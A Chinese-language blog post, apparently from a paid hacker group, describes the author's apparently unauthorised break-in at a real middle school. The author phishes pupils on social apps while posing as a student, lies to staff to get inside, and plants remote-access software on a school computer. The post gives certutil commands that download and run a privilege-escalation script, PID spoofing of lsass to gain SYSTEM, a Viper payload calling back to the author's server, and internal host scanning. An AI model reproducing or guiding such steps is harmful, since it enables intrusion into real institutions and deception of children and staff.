社会工程学 | 看我如何混进初中拿权限

0x01 前言

社工和攻击方一样，都是需要收集对方的信息。踩点/打点

这个初中是我随机选的，前期做的准备工作比较久，没有用到物理黑客的设备！

0x02 踩点

如何踩点？

首先

我们确认目标的大概地点，知己知彼百战百胜，这样子在我们混进去时和混进去之后都有一定的铺垫！先熟悉地形，找到自己所能确认的摄像头还有，重要任职老师的姓名，长相 ... ...

我是如何踩点的？首先，我会有有意无意的出现在这个学校周围，比如说路过，等人之类的。因为在等待朋友途中，对这所学校还是有所观察的！

第二步

社交软件，对于初中生: QQ, Soul都是他们年轻人常玩的软件，要深入了解这所学校，才能更好的进行社会工程学攻击！

Soul通过所在的标签问答等，QQ可以附近加人，以及通过校园墙进行钓鱼！

需要获得什么信息？

# Whoami?
钓鱼对象的任课老师姓名 班级
学校基本作息
都有哪些校长，主任 以及 年级级长，还有学生与老师的在校时间

... ...

我通过伪装学弟的身份获取信息如下:

班主任姓名：陈**
任课年级：九年级

其他科任老师:数学，美术 等
年级级长
初中部校长 ... ...

0x03 “混”

有了基本的信息，我们来混进学校 试一试 很快，冷水就泼下来了:

我以往届师兄的身份，以回来看望学校老师的名义想进去，但是保安把我拦下，说:需要老师带进去，叫我自己打电话叫老师带你进去！

于是我从被我钓鱼的学生那里套到了美术老师的电话

为什么是副科老师？ 因为他们最不容易记住学生样貌与名字，每个学校的副科又少，基本都是一教就是大半个年级甚至是一整个年级！

因为不方便拍照，只能勉强打打字来记录一下我的这个社工过程

我成功以学生身份进来后，不能急着离开，要和美术老师寒暄夺得信任！最好是女的美术老师，比较容易从感性方向入手，抒情很重要！美术老师问了”我”以前在学校的班主任，还有所在班级，还有班级大体都有谁，谁比较调皮捣蛋！

这是非常重要的，只有确认了基本信息，才能取得信任！这时候踩点所收集的信息就非常重要了，以及地形: 只有大体了解你才能不露出马脚！

在取得基本的信任后，我假装有急事，需要用电脑的前提，和她说清楚了用一会学校电脑，因为在前面寒暄我坦白了自己的接触的领域，有时候消息就需要真真假假才能让人相信。既有真诚又有谎骗！

0x04 “黑”

来到电脑室，里面有老师！我没有声张，确认彼此的信息后，他给了我一个没有学生使用比较偏僻的位置。因为我知道学校的作息，也知道电脑老师就这么一个，所以大体时间我是确认的！我自己带了U盘: 里面有绿色版的向日葵 (因为没有物理黑客的设备，勉强凑合)，就硬脱时间，脱到他去叫学生上课！

... ...

把绿色版向日葵放在C盘下，没有关电脑，我就溜了！

0x05 “权限”

首先 登录 向日葵，远程控制win10从administrator提权到system(更改父进程的pid)脚本下载

在windows下启动一个administrator权限的powershell

certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

脚本下载后 我存放在B盘 打开cmd,输入tasklist

找到进程lsass.exe 这个是system权限运行的exe，我们记住他的pid进程号:140然后打开powershell

输入

Set-ExecutionPolicy Bypass -Scope Process
 .psgetsys.ps1
[MyProcess]::CreateProcessFromParent(140,"c:windowssystem32cmd.exe","")

一般情况下将上面命令中的140改为任意一个system权限的进程的pid即可，每台电脑的lsass.exe进程的pid号皆不相同。然后走完上面的流程会弹出cmd窗口 输入whoami

我们便是system

然后我的vps安装了viper登录我的viper

看我截图的步骤来

LHOST输入自己的vps的ip

生成载荷的端口需要和刚才创建载荷的端口一致 生成后会下载一个exe文件，我们通过向日葵上传到win10

我们上传到B盘后打开

双击打开，然后查看viper

我们通过双击打开获得的权限只是admin的，我们可以使用刚才获得system权限的cmd窗口打开文件，也可以使用viper来提权

我这里演示一下viper提权

然后点击执行

它会显示获取成功

我们可以发现 我们获得了system权限

我们来查看存活主机

点击执行 需要一些时间来扫描

这么多的主机我就没有去尝试进一步了，社会工程学也点到为止！

0x06 结尾

这篇文章也算我的记录笔记，不算什么高深的技术文，不喜勿喷！点到为止，没有深入攻击！

从现在开始，星球定价125元！日后只有慢慢涨没有跌价！现在入股不亏，持续输出原创文章，还是小有干货的！